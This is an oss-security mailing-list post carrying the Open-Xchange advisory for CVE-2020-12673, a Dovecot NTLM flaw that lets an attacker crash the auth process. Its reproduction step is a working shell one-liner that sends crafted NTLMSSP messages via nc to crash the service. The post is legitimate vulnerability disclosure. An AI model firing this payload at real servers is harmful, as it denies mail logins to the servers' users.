'[oss-security] CVE-2020-12673: Dovecot IMAP server: Specially crafted NTLM package can crash auth se'

[prev in list] [next in list] [prev in thread] [next in thread] 

List:       oss-security
Subject:    [oss-security] CVE-2020-12673: Dovecot IMAP server: Specially crafted NTLM package can crash auth se
From:       Aki Tuomi <aki.tuomi () dovecot ! fi>
Date:       2020-08-12 13:10:04
Message-ID: dd509a99-f78b-dd33-eca9-f0404dd6e1a2 () dovecot ! fi
[Download RAW message or body]

[Attachment #2 (multipart/mixed)]


Open-Xchange Security Advisory 2020-08-12

Affected product: Dovecot IMAP server
Internal reference: DOP-1870 (Bug ID)
Vulnerability type: CWE-789 (Uncontrolled Memory Allocation)
Vulnerable version: 2.2
Vulnerable component: auth
Fixed version: 2.3.11.3
Report confidence: Confirmed
Solution status: Fix available
Vendor notification: 2020-05-03
CVE reference: CVE-2020-12673
CVSS: 7.5 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H)

Vulnerability Details:
Dovecot's NTLM implementation does not correctly check message buffer
size, which leads to reading past allocation which can lead to crash.

Risk:
An adversary can use this vulnerability to crash dovecot auth process
repeatedly, preventing login.

Steps to reproduce:
(echo 'AUTH NTLM'; echo -ne
'NTLMSSP\x00\x01\x00\x00\x00\x00\x02\x00\x00AAAAAAAAAAAAAAAAAAAAAAAAAAAAA=
AAAAAAAAAAA'
| \
base64 -w0 ;echo ;echo -ne
'NTLMSSP\x00\x03\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\=
x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00AA\x00\x00\x41\x00\x00=
\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\=
x00\x02\x00\x00orange\x00'|
\
base64 -w0;echo ; echo QUIT)=C2=A0 | nc 127.0.0.1 110

Workaround:
Disable NTLM authentication.

Solution:
Upgrade to fixed version.

Best regards,
Aki Tuomi
Open-Xchange oy



["signature.asc" (application/pgp-signature)]

[prev in list] [next in list] [prev in thread] [next in thread]
Configure | About | News | Add a list | Sponsored by KoreLogic